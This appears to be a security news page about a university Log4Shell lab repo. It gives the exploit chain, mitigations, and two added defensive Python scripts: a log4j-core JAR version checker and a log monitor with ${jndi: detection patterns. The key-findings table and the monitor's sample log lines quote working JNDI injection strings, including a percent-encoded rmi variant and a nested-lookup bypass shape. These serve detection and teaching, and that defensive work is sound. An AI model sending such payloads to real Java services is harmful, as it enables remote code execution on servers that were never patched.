OFFSITE.DARK

Jun 29, 2026


Sploitus

  • log4j
  • log4shell
  • cve-2021-44228
  • java
  • sploitus

news

Log4J-PoC — TPAS Log4Shell Lab Stack

TPAS coursework repo: React storefront + vulnerable Log4j 2.14 Spring API + JNDI exploit script with WAF-bypass toggle.

Summary

CVE-2021-44228 (Log4Shell) remains a critical (CVSS 10.0) JNDI injection flaw in Apache Log4j 2.0-beta9 – 2.14.1 — not a 2026 zero-day, but still widely scanned.

DarianRa/Log4J-PoC is a Docker Compose lab: a Spring Boot shopping-list app on Log4j 2.14.1, a marshalsec LDAP/HTTP server to serve the JNDI referral, and a reverse-shell listener as proof of code execution, demonstrating the classic exploit chain end to end.

Key Findings

Finding         Detail
CVE             CVE-2021-44228 (Log4Shell) + related 2021 chain CVEs
Component       Apache Log4j 2.0-beta9 – 2.14.1
Lab trigger     ${jndi:ldap://ldap-server:1389/EvilMalware} in shopping-list item field
Architecture    Docker bridge: vulnerable-app :8080, ldap-server :1389, http-server :8000, attacker-listener :4444
Secondary card  TPAS React + Spring Log4j 2.14 stack (610F8853) with WAF-bypass toggle
Intent          Hochschule Bonn-Rhein-Sieg Secure Software Testing lab / authorized use
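The Component row gives the affected range, and the Mitigation section below says what "fixed" means (2.17.1+, or JndiLookup removed as triage). The script below is an added inventory check, not code from the Log4J-PoC repo: it opens a log4j-core JAR, reads the Maven pom.properties that the artifact ships under META-INF, compares the version against the 2.0-beta9 – 2.14.1 range and the 2.17.1 upgrade target, and reports whether JndiLookup.class is still inside. The sample JAR it builds in memory is a constructed stand-in (only the properties file and a fake class entry), so it runs offline; the pom.properties path and class path are the real ones log4j-core uses.

```python
"""Inventory check for deployed log4j-core JARs (added example, not part of
the Log4J-PoC repo). Version parsing is deliberately simple: it handles the
X.Y, X.Y.Z and X.Y-qualifier shapes log4j 2.x actually uses."""
import io
import os
import re
import zipfile

# Paths that real log4j-core JARs contain.
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

AFFECTED_LOW = "2.0-beta9"    # range from the Component row above
AFFECTED_HIGH = "2.14.1"
UPGRADE_TARGET = "2.17.1"     # from the Mitigation section


def parse_version(v):
    """'2.14.1' -> (2, 14, 1, 1, ''); '2.0-beta9' -> (2, 0, 0, 0, 'beta9').
    A pre-release qualifier sorts below the final release of the same number."""
    m = re.match(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(\w+))?$", v.strip())
    if not m:
        raise ValueError(f"unrecognised log4j version string: {v!r}")
    major, minor, patch, qual = m.groups()
    return (int(major), int(minor), int(patch or 0), 0 if qual else 1, qual or "")


def assess_jar(jar_bytes):
    """Describe one JAR: is it log4j-core, which version, is it inside the
    CVE-2021-44228 range, is it below the upgrade target, is JndiLookup present."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        names = set(zf.namelist())
        if POM_PROPS not in names:
            return {"is_log4j_core": False}
        props = zf.read(POM_PROPS).decode()
    kv = dict(line.split("=", 1) for line in props.splitlines()
              if "=" in line and not line.startswith("#"))
    v = parse_version(kv["version"])
    return {
        "is_log4j_core": True,
        "version": kv["version"],
        "in_cve_2021_44228_range": parse_version(AFFECTED_LOW) <= v <= parse_version(AFFECTED_HIGH),
        "below_upgrade_target": v < parse_version(UPGRADE_TARGET),
        "jndi_lookup_present": JNDI_LOOKUP in names,
    }


def scan_directory(root):
    """Walk a directory tree and assess every *.jar found; returns {path: report}."""
    reports = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".jar"):
                path = os.path.join(dirpath, name)
                with open(path, "rb") as fh:
                    reports[path] = assess_jar(fh.read())
    return reports


def build_sample_jar(version, include_jndi_lookup=True):
    """Constructed stand-in JAR for testing: pom.properties plus an optional
    fake JndiLookup.class entry. Not a real log4j build."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, "#generated\nversion=%s\ngroupId=org.apache.logging.log4j\n"
                               "artifactId=log4j-core\n" % version)
        if include_jndi_lookup:
            zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")  # class-file magic only
    return buf.getvalue()


if __name__ == "__main__":
    for ver, keep in [("2.14.1", True), ("2.14.1", False), ("2.15.0", True), ("2.17.1", True)]:
        print(ver, "jndi" if keep else "no-jndi", assess_jar(build_sample_jar(ver, keep)))
```

Point `scan_directory` at a deployment root (Tomcat `lib/`, a WAR's exploded `WEB-INF/lib/`) to get a per-JAR report. Note that a 2.14.1 JAR with JndiLookup.class removed still reports `in_cve_2021_44228_range=True` and `below_upgrade_target=True`; that is intentional, since the page treats class removal as triage rather than the long-term control. Shaded or fat JARs that rename the Maven metadata path will show up as `is_log4j_core=False`, so treat a negative as "not identified", not "clean".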

Attack Chain

Attacker LDAP/RMI server (init.sh) ← JNDI lookup from logged user input
        ↓
Log4j loads remote Java class
        ↓
RCE on Spring Boot host running vulnerable log4j-core

Impact

Legacy Log4j remains a high-value scanner target. Sploitus surfacing Log4J-PoC repos accelerates mass JNDI injection attempts against lagging Java estates — impact is full server compromise where patches were never applied.

Mitigation

  1. Upgrade Log4j to 2.17.1+ (or supported vendor-patched line).
  2. Remove the JndiLookup class only as emergency triage, not as the sole long-term control.
  3. Block outbound LDAP/RMI from app subnets; monitor for ${jndi: patterns.
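Step 3 asks for monitoring of `${jndi:` patterns in logged input. The helper below is an added example for that step, not code from the Log4J-PoC repo. It URL-decodes each line first, then flags a direct `${jndi:` lookup (case-insensitive, reporting the scheme such as ldap or rmi) and, separately, any nested lookup of the form `${...${...}...}`: user-supplied fields have no legitimate reason to contain one, and nesting is the mechanism behind the WAF-bypass variants the secondary card refers to, so flagging the shape catches them without having to enumerate each spelling. The log lines are constructed samples.

```python
"""Monitor for Log4j lookup syntax in request or application log lines.
Added example for mitigation step 3; not part of the Log4J-PoC repo."""
import re
from urllib.parse import unquote

# Direct JNDI lookup, case-insensitive, tolerant of whitespace around the colon.
DIRECT = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# JNDI scheme that follows, e.g. ldap, ldaps, rmi, dns.
SCHEME = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+):", re.IGNORECASE)
# A second `${` opened before the first `}` closes the outer lookup.
NESTED = re.compile(r"\$\{[^}]*\$\{")


def classify(line):
    """Return None for a clean line, else a dict with the reason, the JNDI
    scheme for direct lookups, and the offset of the first suspicious `${`."""
    decoded = unquote(line)          # %24%7B... is the same payload once decoded
    m = DIRECT.search(decoded)
    if m:
        s = SCHEME.search(decoded)
        return {"reason": "direct_jndi_lookup",
                "scheme": s.group(1).lower() if s else None,
                "offset": m.start()}
    m = NESTED.search(decoded)
    if m:
        return {"reason": "nested_lookup", "scheme": None, "offset": m.start()}
    return None


def scan(lines):
    """Return [(line_no, line, hit)] for every line classify() flags."""
    hits = []
    for i, line in enumerate(lines, 1):
        hit = classify(line)
        if hit:
            hits.append((i, line, hit))
    return hits


# Constructed sample lines in a loose access-log style; the second one carries
# the lab trigger string from the Key Findings table.
SAMPLE_LOG = [
    '10.0.0.5 - - "POST /api/items HTTP/1.1" 200 name=milk',
    '10.0.0.9 - - "POST /api/items HTTP/1.1" 200 name=${jndi:ldap://ldap-server:1389/EvilMalware}',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 ua=${${env:HOSTNAME}}',
    '10.0.0.7 - - "POST /api/items HTTP/1.1" 200 name=$10 off {promo}',
    '10.0.0.7 - - "POST /api/items HTTP/1.1" 200 name=%24%7Bjndi%3Armi%3A%2F%2Fexample.invalid%2Fx%7D',
]

if __name__ == "__main__":
    for line_no, line, hit in scan(SAMPLE_LOG):
        print(f"line {line_no}: {hit['reason']} scheme={hit['scheme']} :: {line}")
```

Run it over a log tail or a request-capture feed; alert on `direct_jndi_lookup` immediately and treat `nested_lookup` as a strong signal worth a ticket. The decode step only covers percent-encoding; if your edge applies other transformations (base64 in headers, double encoding), normalise those before calling `classify`, since the detector only sees what it is handed. This is a monitoring control and does not replace the upgrade in step 1.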
